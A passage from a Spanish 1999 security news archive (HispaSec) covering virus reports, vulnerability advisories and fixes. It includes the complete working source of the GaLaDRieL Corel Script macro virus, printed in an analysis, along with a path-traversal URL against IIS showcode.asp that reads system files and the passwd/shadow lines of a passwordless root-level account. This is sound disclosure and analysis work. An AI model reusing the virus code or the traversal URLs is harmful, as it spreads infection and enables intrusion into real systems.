de introducir todos estos elementos en una cocktelera y agitar,
acción que se produce cada vez que el virus cambia de máquina, es
uno de los 63 distintos virus que componen un solo virus, Girigat.

El virus además posee cuatro maneras distintas de activarse por
medio de "payloads" gráficos, que son los que han delatado al
virus y, por tanto, desencadenado la ola de infecciones reportadas.
La activación del virus se produce al ejecutar una aplicación tres
meses después de haber sido infectada, y existirá un 50% de
probabilidades de que se active uno de los cuatro "payloads" de
este virus.

La primera activación modifica el registro de configuraciones de
Win32 con el fin de cambiar el escritorio y hacer que en éste se
muestre el logotipo del virus. La segunda activación es un bucle
mediante el cual el cursor del ratón se mueve de manera constante
a posiciones aleatorias de la pantalla, haciendo imposible el uso
de Windows. El tercer "payload" consiste en mostrar un cuadro de
diálogo del tipo "Acerca de Windows", ligeramente modificado por
los datos del virus y con las cadenas de copyright de su autor.
Por último, el cuarto y último posible "payload" es un nuevo bucle
infinito que emplea el virus para abrir y cerrar la bandeja del CD.
Este efecto es capaz de causar deterioros en el "hardware", hasta
el punto de tener que arreglar o sustituir la bandeja del CD en
caso de que la ejecución del "payload" se prolongue durante horas,
tal y como se ha reportado en contados -pero existentes- casos
desde Estados Unidos e Italia.

En HispaSec hemos decidido ofrecer esta exclusiva, acompañada
de un detallado análisis del virus, en el que explicamos su
funcionamiento y advertimos de sus posibles consecuencias, que
parecen estar paliadas desde el momento en que AVP distribuyó la
vacuna específica en una de sus actualizaciones.

Más información:
Análisis de HispaSec
AVP Virus Encyclopedia


Giorgio Talvanti



domingo, 16 de mayo de 1999

Ataque por fuerza bruta a sshd2 v.2.0.11

De la mano de los españoles J.J.F./Hackers Team, autodenominados
como "grupo de hackers blancos", nos llega este nuevo aviso de
seguridad. Afecta a los sistemas Unix que tengan instalados sshd2
versión 2.0.11 con las opciones por defecto, las cuales permiten,
sin dejar ningún rastro, un ataque por fuerza bruta.
Ssh (Secure Shell) es un programa de login remoto que viene a
reemplazar a rlogin, rsh y rpc, permitiendo la comunicación con
otra máquina para administrarla remotamente, ejecutar comandos,
transferir ficheros, etc. En todo momento, Ssh, utiliza métodos
de cifrado (RSA, IDEA, triple-DES, DES, Blowfish,...) para proveer
autentificación y comunicaciones seguras a través de canales
inseguros, como puede ser Internet.

En el aviso de J.J.F./Hackers Team describen como "en la
instalacion por defecto del sshd2 (hasta la version 2.0.11), se
deja una puerta libre a un ataque de brute force sin loguear la
ip atacante por parte del sshd. A partir de la versión 2.0.12
ya se loguea la conexión."

Prosiguen explicando como se puede llevar acabo el proceso
evitando en todo momento el que se registre la IP del atacante:
"el demonio sshd al conectar con un cliente ssh tiene un numero
definido de intentos para que le envíen la password correcta antes
de desconectar. En la instalación por defecto este numero de
intentos es 3. Si antes de agotar los intentos rompemos la
conexión, el sshd no logueara los intentos de conexión, y es
mas, tampoco logueará la ip del cliente que conecto con el
demonio."

Por último, recomiendan actualizarse a la versión 2.0.12 o
superior, donde se corrige este problema. También proporcionan
la solución en la versión afectada, que pasa por "editar el
fichero sshd2_config (normalmente en /etc/ssh2) ajustar el campo
PasswordGuesses con el valor 1. De este modo cada vez que se
intente una password y se falle el sistema logueara via syslog".

Más información:
J.J.F./Hackers Team
SSH Communications Security


Bernardo Quintero



sábado, 15 de mayo de 1999

Galadriel, una semana después

Apenas hace una semana desde que os presentamos en exclusiva a
Galadriel, el primer virus para Corel Draw. Nada más detectar
el fichero infectado procedimos a comprobar que realmente
funcionaba, a continuación, y como viene siendo habitual,
escribimos un análisis partiendo de su código. Transcurridos
unos días, de aquel descubrimiento que HispaSec hacía público
en primicia, hemos podido comprobar la actividad que el virus
ha desatado entre las casas antivirus.
Desde el primer momento que convertimos a Galadriel en un virus
de dominio público, a través de una-al-dia, no cesaron los
emails desde las casas antivirus interesándose por el nuevo
espécimen. Desde aquellas que nos solicitaban una muestra del
virus, pasando por las que se apresuraron en hacernos llegar
sus actualizaciones para combatirlo, hasta las menos afortunadas
que nos pidieron un fichero binario infectado. Los ficheros
de "guiones" en Corel Script están en ascii sin ningún tipo
de codificación.

El hecho de que las casas antivirus mostraran tanto interés
por poder ofrecer la solución a sus usuarios es de alabar. Sin
embargo, una vez comenzaron a sucederse los análisis y notas
de prensa, todo parece indicar que el motivo de la urgencia
venía dado por intereses de marketing, más que de protección
real hacia los usuarios. Nadie niega que la repercusión del
virus es mínima en cuanto al daño y la difusión que puede
conseguir.

Central Command (AVP):
http://www.avp.com/csgala/csgala.html

Data Fellows:
http://www.datafellows.com/v-descs/csv.htm

Network Associates:
http://www.nai.com/about/news/press/1999/may/05-11-99_i.asp

Panda Software:
http://www.pandasoftware.com/inet5657.htm

Sophos:
http://www.sophos.com/downloads/ide/index.html#csv-a
http://www.sophos.com/companyinfo/pressrel/uk/19990512corel.html

Symantec:
http://www.sarc.com/avcenter/venc/data/cs.galadriel.html

Debido a la expectación levantada, Corel Draw ha tenido que
salir al paso con una nota de prensa en la que explica el
funcionamiento del virus, haciendo hincapié en que éste no se
encuentra en ninguna de sus distribuciones.

Corel Draw:
http://www.corel.com/news/1999/may/may_12_1999.htm

Por último, parece que le toca el turno a los medios de
comunicación, donde a buen seguro podremos ver en lo sucesivo
como GaLaDRieL ocupa parte de su atención.

PCWorld News:
http://www.pcworld.com/pcwtoday/article/0,1510,10954,00.html

Desde HispaSec nos alegramos en parte por la reacción que han
demostrado las casas antivirus y los medios en general. Sin
embargo, entendemos que se están llevando a cabo, a día de hoy,
infecciones por otros virus, que si tal vez no sean tan fáciles
de "vender" a la opinión pública, si son mucho más importantes
por sus efectos y la expansión que están consiguiendo.

En este sentido, nuestro laboratorio ha detectado un nuevo
virus Win32, también de origen español, que se prevé se
convierta en un nuevo CIH ó Marburg, llegando a ocupar lugares
privilegiados en las listas de prevalencia. Como respuesta a
este virus, HispaSec ha puesto a su mejor "virólogo", Giorgio
Talvanti, en un trabajo de investigación del que pronto podréis
disfrutar. Ahora sólo nos queda que las casas de antivirus y
los medios en general dediquen, si quiera, la mitad del
esfuerzo que han derrochado en GaLaDRieL. En esta ocasión,
estará totalmente justificado.


Bernardo Quintero



viernes, 14 de mayo de 1999

Un icono puede colgar Explorer 5.0

Nunca un icono dio tantos problemas a una aplicación de Microsoft,
un simple icono puede llegar a producir el cuelgue de Internet
Explorer 5.0, e incluso podría llegar a comprometer la seguridad.
Entre las nuevas características incorporadas en Microsoft Internet
Explorer 5.0 se brinda la oportunidad al desarrollador de un
servicio web de personalizar mediante un icono el enlace que
aparece en las páginas de favoritos. Basta con que el administrador
incluya un icono con el nombre favicon.ico en el directorio para
que cuando el usuario decida añadir la página a los favoritos, el
icono se suba de forma automática e identifique el link con dicha
imagen.

Este icono ya dio que hablar hace días ya que a través de él, se
brinda la oportunidad al administrador de controlar los usuarios
que añaden las páginas en los favoritos (www.hispasec.com/unaaldia.asp?id=172).
Pero se ha descubierto que este icono puede causar aun más
problemas, pues Internet Explorer no realiza ningún chequeo
sobre el formato del archivo, con lo cual se admite como válido
cualquier archivo con el nombre favicon.ico. Esto puede dar lugar
a un cuelgue bajo plataformas Windows 95/98 en caso de el
administrados sitúe un archivo con datos erróneos (que no sea
un icono).

El problema parece estar asociado al módulo user.exe, que es
diferente entre versiones del sistema operativo, por lo que no
se da bajo Windows NT. Aunque no se ha comprobado todo parece
indicar que este error puede tratarse de forma similar a los de
sobrecarga de buffer, con lo que introduciendo algún tipo de
código ejecutable dentro del falso icono se podrían llegar a
conseguir privilegios o información en la máquina atacada.

Más información:
Bugraq: http://www.geek-girl.com/bugtraq/1999_2/0336.html
Bug favicon: http://web.cip.com.br/flaviovs/sec/favicon/index.html


Antonio Ropero



jueves, 13 de mayo de 1999

Vulnerabilidad en la instalación de OpenLinux 2.2 con LISA

Se ha detectado una vulnerabilidad durante la instalación de
OpenLinux 2.2. Está basada en la creación automática, por parte
del sistema, de una cuenta con password nula que se queda
operativa una vez terminado el proceso de instalación.
La distribución OpenLinux de Caldera incluye una utilidad de
administración de sistema orientada en menús, que es utilizada
para configurar el sistema. La utilidad se denomina LISA, Linux
Installation and System Administration, y es muy util en aquellos
casos en los que se quiera evitar la edición directa de los
ficheros de sistemas.

Se ha encontrado una vulnerabilidad durante la instalación de
OpenLinux 2.2 cuando se utiliza el disco de arranque de LISA. En
el proceso de instalación se crea de forma automática un usuario
con nombre "help", con uid=0 y gid=0, y sin password. Una vez que
hemos introducido el password de root y de usuario or defecto, se
crea un nuevo fichero passwd y shadow, con la nueva información
introducida. Sin embargo, si editamos esos ficheros podremos
comprobar como el usuario "help" sigue apareciendo en estos
ficheros definitivos, lo que compromete al sistema:

/etc/passwd
help:x:0:0:install help user:/:/bin/bash

/etc/shadow
help::10709:0:365:7:7::

Hay que indicar que existen dos versiones de LISA, la nueva versión,
gráfica, no se encuentra afectada por esta vulnerabilidad. Para
evitar confusiones se puede comprobar la versión de LISA basándose
en los números de los discos de imagen, que en el caso de la versión
afectada es 1xx y en la versión gráfica es 2xx.

La solución pasa por, una vez terminada la instalación, editar los
ficheros /etc/passwd y /etc/shadow, procediendo a borrar las líneas
que comienzan con "help", de manera que evitamos la vulnerabilidad.

Más información:
Bugtraq


Bernardo Quintero



miércoles, 12 de mayo de 1999

Nuevos retos criptográficos de la Administración

Nos encontramos en el umbral de la Sociedad de la Información,
en la que Internet está desempeñando un papel protagonista,
facilitando formas de relación entre los miembros de la sociedad
que hace tan sólo unos años no eran siquiera soñadas.
En este contexto perfilado por las nuevas tecnologías de la
información emergentes, las Administraciones españolas han
apostado por el futuro de Internet como vehículo de comunicación
e interacción con el ciudadano. La evolución de su aportación al
desarrollo de Internet ha seguido los pasos comunes en la mayoría
de empresas privadas, universidades, etc. Primero, desarrollo de
webs testimoniales de presencia en Internet en los que se pone
información a disposición del público, para continuar más adelante
incorporando servicios de valor añadido, como la capacidad de
realizar gestionesdirectamente a través de la Red.

A medida que el uso de Internet crezca en España, los ordenadores
personales vayan penetrando en los hogares y las tarifas de acceso
se reduzcan, aumentará entre los españoles la demanda de este tipo
de servicios a través de redes de comunicaciones. Precisamente para
satisfacerla, la Fábrica Nacional de Moneda y Timbre (www.fnmt.es)
lidera el proyecto CERES (CERtificación ESpañola), cuyo objetivo es
erigirse en Autoridad de Certificación para actuar como garante en
todas las relaciones habidas con las administraciones públicas
(http://www.cert.fnmt.es/index.htm).

Como toda autoridad de certificación, la función de la FNMT será
emitir certificados digitales en los que se atestigüe la identidad
de la persona que los porta. Un certificado digital es un documento
electrónico que garantiza la identidad de una persona. Contiene (o
puede contener) información acerca de la persona, como su nombre,
DNI, su dirección de correo, fecha de emisión y de caducidad del
certificado y la parte pública de su pareja de claves pública y
privada, todo ello firmado por la FNMT. Estos certificados le
permitirán realizar gestiones con las distintas administraciones
(estatales, autonómicas o locales), bien remotamente desde su casa
a través de Internet o personándose con ellos en las dependencias
de la Administración correspondientes.

Para que los ciudadanos puedan almacenar estos certificados, y
puedan utilizar su clave privada para firmar documentos con validez
legal ante la Administración, todo ello de manera electrónica, la
FNMT emitirá unas tarjetas electrónicas conteniendo toda la
información del certificado personal. De esta forma, el poseedor
de la tarjeta no tiene más que introducirla en un lector al efecto,
para que pueda realizarse operaciones como autenticarse ante un
servidor web de la Administración para acceder a datos privados o
firmar un documento, como por ejemplo su declaración de la renta.
Para completar estas tareas, se comercializarán lectores de tarjeta,
cuyo precio oscilará entre las 5.000 y las 7.000 pesetas,
dispositivos que podrán conectarse al ordenador personal
independientemente del sistema operativo que utilice. El único
software requerido es el navegador Netscape Navigator o Internet
Explorer, versiones 4.0 ó superiores.

Se prevé que el despliegue definitivo de las tarjetas y su utilización
en gestiones con la Administración dará comienzo a partir del segundo
semestre de este año. De momento, y hasta que las tarjetas estén
disponibles y plenamente operativas, por primera vez se puede
realizar la declaración de la renta del año fiscal 1998 a través de
Internet (http://www.cert.fnmt.es/aeat/). El proceso hace uso masivo
de la criptografía de clave pública (certificados, firmas digitales,
claves públicas y privadas, etc.) y representa una oportunidad
inigualable para comprender, participando como protagonista, los
procesos criptográficos que acompañan a las firmas digitales y
autoridades de certificación.

¿Eres un nuevo ciudadano de la Sociedad de la Información? ¿Quieres
ver la criptografía en acción? Declara este año a través de Internet.


Gonzalo Álvarez Marañón
criptonomicon@iec.csic.es
Boletín Criptonomicón #49
http://www.iec.csic.es/criptonomicon



martes, 11 de mayo de 1999

Nuevos agujeros de Guninski en los navegadores más populares

Georgi Guninski ya habitual en nuestro servicio de noticias ha
descubierto nuevas vulnerabilidades, esta vez se ven afectados
tanto Netscape Communicator como Microsoft Explorer.
La vulnerabilidad hace alusión a la forma en que ambos navegadores
manejan los bookmarks o favoritos. A pesar de que ambos navegadores
tratan los enlaces seleccionados de forma totalmente diferente,
existe un defecto tanto en Internet Explorer 5.0 como Netscape
Communicator 4.51 (presumiblemente todas las versiones 4.x de ambos
navegadores también sean vulnerables).

El problema surge si el usuario añade una página al bookmark o a los
favoritos y posteriormente recupera la dirección, una URL en JavaScript
especialmente diseñada. Cuando la dirección es seleccionada el código
JavaScript se ejecuta en el contexto (mismo dominio y protocolo) de la
página abierta anteriormente a la elección del favorito.

De esta forma, el código JavaScript tiene acceso a la página en el
mismo dominio. Un caso interesante es abrir el bookmark cuando el
documento activo es un archivo local (el protocolo es file: ) entonces
el código JavaScript tiene acceso a los archivos locales y directorios.
Las vulnerabilidades son más serias bajo Internet Explorer 5.0.

Algunas vulnerabilidades encontradas son:

Para Internet Explorer 5.0:
Lectura de archivos locales si se conoce el nombre del fichero.
Lectura de archivos del dominio del documento activo (incluso si el
servidor web se encuentra bloqueado por un firewall).
Lectura de los enlaces de la página activa y en las del mismo dominio.
Falsificación de páginas web (web spoofing) en el dominio de la página
activa.

Para Netscape Communicator 4.51:
Navegación por directorios locales.
Lectura de ficheros locales en el directorio del documento activo.
Lectura de los enlaces de la página activa y en las del mismo dominio.
Falsificación de páginas web (web spoofing) en el dominio de la página
activa.

La solución para estos problemas pasa por deshabilitar JavaScript o no
guardar páginas en las que no se confíe.

Más información:
Demostración para IE5
Demostración para Communicator



Antonio Ropero



lunes, 10 de mayo de 1999

MRECOVER recupera los discos duros dañados por el CIH "Chernóbyl"

Desde HispaSec, y de la mano de su creador, os presentamos y facilitamos
a MRECOVER. Esta utilidad saltó a todos los medios de comunicación hace
unos días, estando aun en desarrollo, por presentarse como la solución
para poder recuperar la información de los discos duros dañados por el
virus CIH, alias Chernóbyl.
La utilidad MRECOVER fue diseñada, sobre todo, para recuperar los datos
de los discos duros dañados por el virus CIH. Este software es FREEWARE,
así que puede y debe ser distribuido libremente. Quiero hacer hincapié
en que no se debe utilizar por terceros con ánimo de lucro ó actividades
con intereses alejados de la filosofía FREEWARE.

El virus CIH, alias Chernóbyl, tiene en la destrucción de la tabla de
partición uno de sus efectos, lo que daña una parte vital de la primera
partición. Esta zona del disco duro almacena información que permite
acceder de manera individual a cada una de las particiones en el disco.
Aunque la tabla de partición esté destruida, MRECOVER reconstruye con
éxito de forma automática la tabla de partición buscando secuencias
válidas de la partición en todos los discos duros. Esta utilidad
reconstruye de forma directa las particiones, a diferencia de la forma
de actuación de otros programas comerciales, como NDD.

Con respecto a la información contenida en cada partición, es posible
recuperar todos los datos excepto de la primera en todos los casos.
MRECOVER podrá recuperar la primera partición cuando se esté utilizando
FAT32 y ésta sea mayor a 1GB. La perdida de información vital provocada
por el virus impide la recuperación directa de los datos de la primera
partición. Aunque sigo el estudio del problema con FAT16, todo parece
indicar que no podré llevar a cabo la recuperación con éxito en este
caso.

Por lo tanto, después de utilizar MRECOVER en un sistema dañado por el
CIH, podremos acceder a todas las particiones, excepto en determinados
casos donde no ocurrirá con la primera partición.

Uso del software

Primero debemos de contar con un disco de sistema con el que iniciar el
ordenador y ejecutar MRECOVER a continuación. En algunos casos será
necesario configurar la BIOS para que el arranque se realice desde el
disquete, en vez desde la unidad de disco duro. En el caso de que CIH
haya dañado la BIOS, deberemos primero proceder a su reparación física.

Cuando haya ejecutado la aplicación, MRECOVER le proporcionará la
información necesaria para proceder. Nos pedirá seleccionar un disco
duro de la lista (si poseemos más de un disco duro físico en el sistema),
se nos mostrará el estado actual del disco duro seleccionado, y la
información actual sobre las particiones.

Si no se encuentra ninguna información vital de la partición, preguntará
si había más de una partición en su sistema. Si selecciona "N", no
procederá a buscar, y pedirá si desea asignar todo el espacio a una
partición. Es muy importante de que nos cercioremos de lo que estamos
indicando en esta etapa. En el caso de que accidentalmente no se tuviera
más de una partición y no se haya asignado todo el espacio a una,
podremos utilizar de nuevo la utilidad y buscar en esta ocasión otras
particiones.

A continuación se nos preguntará por el tamaño de la primera partición.
Esto se realiza para agilizar la búsqueda, y no necesita porque ser
exacto en todos. Pero recordemos, siempre debemos de dar un tamaño más
pequeño que el real. Si no estamos seguros, indicaremos 0, para buscar
desde el principio.

Después de encontrar una secuencia de la partición se mostrará la
información. Si estamos de acuerdo con la información encontrada,
seleccionaremos "Y", que de nuevo deberemos de indicar para asegurarnos
de no incurrir en un error. Después de esta reconfirmación, MRECOVER
comenzará la reconstrucción de la tabla de particiones. Nos preguntará
por el tipo de la primera partición, si es FAT16 o FAT32, datos que
proporcionados correctamente pueden ayudar a la recuperación.

Una vez reconstruida la partición, si la primera es FAT32 MRECOVER debe
haber recuperado su contenido. En caso contrario deberemos de formatear
la partición y instalarle el sistema para poder realizar el arranque
desde él.

Conclusiones

Este software fue construido y probado en un gran número de discos duros,
pero en ningún caso con tamaño superior a los 8GB. El programa puede
contener errores menores, debido a que fue desarrollado en un corto
espacio de tiempo. Quedo a la espera de que me hagan llegar los problemas
que se encuentren durante su uso. En estos momentos estoy trabajando en la
recuperación de la FAT16, lo que permitirá el poder salvar algunos
ficheros de la primera partición en estos casos. También estoy pensando
en desarrollar MRESCUE, un programa que realizará una copia de la
información vital de las particiones, y la FAT, necesarias para poder
recuperar los datos en futuros desastres.

Versiones:

28 April 1999 - MRECOVER 1.0 Primera versión.
30 April 1999 - MRECOVER 1.05 Errores corregidos, soporta discos de 8GB.
01 May 1999 - MRECOVER 1.5 Recupera primeras particiones FAT32.
02 May 1999 - MRECOVER 1.51 Corregido error menor.
04 May 1999 - MRECOVER 1.7 Corrección de error, y chequeo en varias particiones
FAT32.
06 May 1999 - MRECOVER 1.71 Usar esta versión si lvemos un mensaje de error durante
la ejecución de la versión 1.7.

MRECOVER:
http://www.hispasec.com/mrecover.asp

Desde HispaSec se recomienda utilizar esta utilidad sólo en aquellos
casos en los que el sistema se encuentre dañado por el virus CIH. En
cualquier caso, deberemos de proceder con este ejecutable con máxima
precaución, toda la que se merece cualquier ejecutable bajado desde
Internet y del que desconocemos su código fuente.


Monirul Islam Sharif
Autor del MRECOVER
Estudiante del Departamento de Ciencias de la Computación
Universidad de Dhaka, Bangladesh.



domingo, 9 de mayo de 1999

Páginas de ejemplo de IIS permiten consultar cualquier archivo del servidor

Se ha descubierto un archivo de ejemplo dentro de Internet Information
Server (IIS), el servidor web de Microsoft para Windows NT, a través
del cual se puede visualizar cualquier archivo contenido en el sistema.
Como es habitual en cualquier programa, Internet Information Server
incluye una serie de archivos de ejemplo. De esta forma, adjunta una
colección de páginas web que muestran las posibilidades del código asp
y que sirven para que los desarrolladores de páginas web aprendan a
realizar aplicaciones web. Entre dichos ejemplos, se encuentra
«showcode.asp» diseñada para visualizar el código fuente de las
páginas a través de un navegador. Showcode.asp acepta el nombre de
una página web como parámetro, tras lo cual mostrará el código de la
página.

Pero la seguridad incorporada en «showcode.asp» no es la adecuada y
permite a cualquier usuario, a través de su navegador web visualizar
el contenido de cualquier fichero del servidor web, incluyendo los que
se encuentren fuera de la raiz de documentos del servidor.
Muchos webs comerciales mantienen logs e información de los compradores
como números de tarjetas de crédito, direcciones, etc en ficheros de
texto en el servidor. El atacante podrá tener acceso a este tipo de
datos, así como al código de las páginas web, en las cuales obtendrá
información referente al nombre de dichos archivos, de las bases de
datos, passwords, etc. Podrá tener incluso acceso al archivo de
passwords de Windows NT, con lo que se podría conseguir un acceso
total a la máquina.

Showcode.asp se instala por defecto en la URL:

http://www.servidor.com/msadc/Samples/SELECTOR/showcode.asp
y toma como parámetro el nombre del archivo a visualizar. El formato
de este argumento es: source=/ruta/nombre_archivo

Así, por ejemplo, para visualizar el código de showcode.asp basta con
hacer:

http://www.servidor.com/msadc/Samples/SELECTOR/showcode.asp?source=
/msadc/Samples/SELECTOR/showcode.asp

El ejemplo demuestra la peligrosidad del problema, es fácil consultar
el contenido del archivo. El autor de esta página añadió un chequeo de
seguridad de tal forma que sólo se visualizan aquellas páginas que se
encuentran por debajo del directorio «/msadc» del sistema. El problema
reside en que dicho análisis de seguridad no comprueba la inclusión en
la URL de los caracteres «..». Tan solo se verifica que la URL contenga
la cadena «/msadc/». Esto permite que se pueda ver cualquier fichero
fuera de los directorios de ejemplo.

Por ejemplo, una URL que visualice el archivo boot.ini que se encuentra
en el directorio raiz quedaría como sigue:

http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=
/msadc/Samples/../../../../../boot.ini

Si se ha realizado una instalación por defecto del servidor web, será
fácil localizar el código de las páginas web así como de determinados
archivos vitales del sistema, como el archivo de passwords de NT. La
solución del problema pasa por eliminar completamente el directorio de
ejemplos «/msadc/», así como omitir la instalación de todos los
ejemplos al realizar la instalación de servidor.

Más información:
L0pht
Microsfot
Boletin Microsoft


Antonio Ropero



sábado, 8 de mayo de 1999

Microsoft ofrece el Service Pack 5 para Windows NT

Aun podemos recordar la fecha en que Microsoft lanzó el Service
Pack 4, el conjunto de parches destinado a corregir todos los
errores de Windows NT 4.0, tapar los agujeros de seguridad
encontrados hasta la fecha y ofrecer la compatibilidad con el
año 2000. En estos días Microsoft ofrece la actualización a
través del Service Pack 5.
La primera noticia que ofreció una-al-día, hace seis meses, hacía
alusión al recientemente aparecido (en aquellas fechas) Service
Pack 4. Desde entonces muchos han sido los problemas de seguridad
encontrados en el sistema operativo profesional de Microsoft.

Anteriormente se criticaba a Microsoft por la tardanza entre las
actualizaciones, así como los nuevos errores que se introducían a
través de los primeros Service Pack. La compañía de Redmond
dispuesta a remediar esto, ofrece las nuevas actualizaciones con
mayor frecuencia y con un desarrollo más serio. Ahora se realiza
un proceso que incluye un sistema de «betatesting», este Service
Pack esta en fase de pruebas desde marzo, así como una agenda de
publicaciones continua.

Esta actualización incluye mejoras en la compatibilidad con el
año 2000 que no se realizaron en el SP4. Aunque Microsoft afirma
que no es necesario instalar el Service Pack 5 para mantener la
compatibilidad con el 2000, ya que con el SP4 se introdujeron
todas las actualizaciones imprescindibles para garantizar la
ausencia de problemas.

Por desgracia los usuarios de Windows NT en español deberán
esperar al menos un mes más para disponer de este Service Pack
para sus sistemas. Por ello en HispaSec a la hora de instalar
Windows NT recomendamos emplear la versión en inglés (al menos
en los servidores), ya que Microsoft siempre publica con un mes
de antelación las actualizaciones y parches necesarios.

Más información:
Microsoft Service Pack 5
Información Microsoft SP5
Cnet


Antonio Ropero



viernes, 7 de mayo de 1999

Siguen los problemas en Internet Explorer 5

El último navegador de Microsoft, Internet Explorer 5, parece que
sigue rodeado de problemas. En esta ocasión se ha descubierto que
el acceso a los sitios seguros previamente visitados, no es tan
privado como cabría desear.
No cesan los problemas para Internet Explorer 5, en esta ocasión
se ve afectada la privacidad de los sitios visitados con este
navegador bajo Windows 98. El usuario accede a un sitio seguro
introduciendo su nombre de usuario y clave, y navega por el web.
Pero el usuario cierra la sesión y abandona el PC convencido de
que la necesidad de introducir la password protege sus datos.

Pero nada más lejos de la realidad, la siguiente persona que
acceda al PC puede entrar fácilmente en los sitios visitados,
cuando aparezca el cuadro preguntando la password, bastará con
pulsar el botón de «cancelar», y tras ello los botones de «Atrás»
y «Adelante». De esta forma, el atacante tendrá acceso a cualquier
lugar visitado anteriormente. Esto representa un grave problema,
especialmente en cibercafés y lugares públicos, y con sitios de
correo por web, como Hotmail, que permiten leer el correo a
través de páginas web.

Microsoft ha confirmado este problema, aunque todavía no dispone
de un parche e investiga si el problema afecta en alguna ocasión
a la plataforma Windows NT. Un remedio rápido y sencillo se basa
en limpiar la cache en el momento en que se abandone la máquina
(en herramientas/opciones de internet/General/Eliminar Archivos).


Más información:
ZDNet: http://www.zdnet.com/anchordesk/story/story_3351.html


Antonio Ropero



jueves, 6 de mayo de 1999

HispaSec descubre el primer virus para Corel Draw

Presentamos a "GaLaDRieL", el primer virus basado en Corel
Script, el lenguaje de programación para la automatización de
tareas y guiones de Corel Draw. Aunque sus efectos no son dañinos,
se trata sin duda de una innovación en el campo de los virus de
macro que puede abrir una nueva vía de desarrollo.
Corel Script es el lenguaje, basado en el popular BASIC, para la
programación de macros en el paquete de Corel. Una macro es un
programa de ordenador que ejecuta una serie de instrucciones para
automatizar tareas repetitivas o simplificar acciones complicadas,
pasando por solicitar entradas, visualizar mensajes o dialogar con
otras aplicaciones. Es lo que Corel Draw denomina como guiones, y
es este tipo de archivos, con extensión CSC, los que pueden ser
afectados por este nuevo virus.

En la primera línea de su código podemos encontrar la denominación
de origen: nombre, autor, y grupo de creadores de virus al que
pertenece.

---------
REM ViRUS GaLaDRieL FOR COREL SCRIPT bY zAxOn/DDT
---------

A continuación recoge la fecha del sistema y comprueba si coincide
con el 6 de junio de cualquier año. En tal caso salta a la etiqueta
"Elessar" donde se encuentra el payload (efecto), que consiste en
mostrar un mensaje basado en "El Señor de los Anillos". En cualquier
caso el programa salta a la etiqueta "Palantir".

---------
fecha$=GetCurrDate ()
If Left(fecha$,1)="6" Then If Mid(fecha$,3,2)="06" Then Goto Elessar
Goto Palantir
Elessar:
Mensajito$= "
Ai! laurië lantar lassi súrinen!.
Yéni únótime ve rámar aldaron,
yéni ve linte yuldar vánier
mi oromardi lisse-miruvóreva
Andúne pella Vardo tellumar
nu luini yassen tintilar i eleni
ómaryo airetári-lirinen.
...."
Titulo = "GaLaDRieL ViRUS bY zAxOn/DDT"
Messagebox Mensajito$,Titulo,64
----------

El virus busca el primer fichero que contenga la extensión CSC
(Corel Script) con los atributos 32 o 128, que equivalen a
archivos de fichero y normales, respectivamente. Cuando encuentra
uno con estas características lo abre para lectura y comprueba que
no contenga la línea "REM ViRUS", que determina que no ha sido
infectado con anterioridad. Cuando encuentra un fichero adecuado
a sus necesidades asigna su nombre a la variable "victima$".

----------
Palantir:
nombre$=FindFirstFolder ("*.csc",32 or 128)
Do while not nombre$=""
Open nombre$ For Input As #1
Palacios_Intemporales:
Line Input #1,linea$
If linea$="" then goto Palacios_Intemporales
if victima_bool=1 Then Goto Esgaroth
If Instr(linea$,"REM ViRUS",1)=0 then
victima$=nombre$
victima_bool=1
End if
-----------

El virus sigue buscando archivos que concuerden con su patrón
inicial, extensión CSC y atributos 32 o 128, a través del comando
"FindNextFolder ()". Cuando encuentra un fichero donde el virus
se encuentra alojado, guarda su nombre en la variable
"yo_estoy_en$". Una vez tiene a la víctima (victima$) y un
fichero infectado (yo_estoy_en$), salta a la etiqueta "LothLorien".
En el caso de que no haya podido encontrar a ambos da por terminada
su acción saltando a la etiqueta "Los_Puertos_Grises".

-----------
Esgaroth:
If Instr(linea$,"REM ViRUS",1)<> 0 Then
yo_estoy_en$=nombre$
conocimiento=1
End if
Close
If conocimiento=1 Then If victima_bool=1 Then Goto LothLorien
nombre$=FindNextFolder ()
If nombre$="" Then Goto Los_Puertos_Grises
Loop
-----------

Por último nos encontramos con una manera peculiar, y poco
optimizada, de infectar el fichero víctima con el virus. Borra
el fichero temporal "mallorn.tmp" que podría encontrarse en el
sistema por anteriores infecciones. Renombra el fichero víctima
a "mallorn.tmp", para lo que utiliza la instrucción
"Rename victima$,"mallorn.tmp",0". El parámetro "0" indica que en
el caso de encontrarse el fichero "mallorn.tmp" sea sobreescrito,
con lo que se podría haber ahorrado el borrarlo anteriormente.

Abre el fichero que contenía el virus "yo_estoy_en$" para lectura,
y la víctima para escribir en él. A continuación, mediante un bucle,
va pasando línea a línea el virus, hasta encontrarse con la cadena
"REM END" que le indica que ha terminado de copiar el virus. Cierra
los ficheros, y abre de nuevo el archivo víctima, en esta ocasión
en modo "Append" para adjuntarle, por el mismo método, las líneas
del fichero original que guardó en "mallorn.tmp". Al final vuelve
a borrar el archivo temporal. Por último nos encontramos con una
línea de comentario que ha utilizado anteriormente para detectar
el final del virus.

-----------
LothLorien:

Kill "mallorn.tmp"
Rename victima$,"mallorn.tmp",0
Open yo_estoy_en$ For Input As #1
open victima$ For Output As #2
Do While Not Left(linea$,7)="REM END"
Line Input #1,linea$
Print #2,linea$
Loop
Line Input #1,linea$
Print #2,linea$
Close
Open victima$ For Append As #1
Open "mallorn.tmp" For Input As #2
Do While Not Eof(2)
Line Input #2,linea$
Print #1,linea$
Loop
Close
Kill "mallorn.tmp"

Los_Puertos_Grises:
REM END OF ViRUS GaLaDRieL bY zAxOn/DDT
------------

Sin duda, se trata de un virus que no obtendrá apenas difusión, a
lo que hay que sumar que su código no está optimizado. Suponemos
pues, que la intención del autor ha sido demostrar la viabilidad
para desarrollar virus en este entorno, dejando atrás otros
objetivos más mundanos. En definitiva, nos encontramos ante un
virus innovador en cuanto a la plataforma para la cual está
desarrollado, y que puede ser el principio de una nueva familia
de virus de macro para Corel Draw.


Bernardo Quintero



miércoles, 5 de mayo de 1999

Sanidad y consumo ayuda a los usuarios ante el 2000

El Ministerio encargado de la defensa de los consumidores da
a conocer una relación de productos comercializados en España
durante el periodo comprendido entre los años 1996 y 1998 y el
grado de incidencia del problema del 2000 en estos.
El mencionado listado está presente en la dirección www.consumo-inc.es
y la actualización es semanal, dentro de este, están representadas
las 109 empresas del mundo de la informática, electrodomésticos,
telecomunicaciones, industrias electrónicas, etc.

De las 109 empresas consultadas, sólo 79 aseguran que los usuarios
finales no se verán afectados por el "Efecto 2000". Este
estudio-encuesta es fruto de requerimientos realizados en virtud
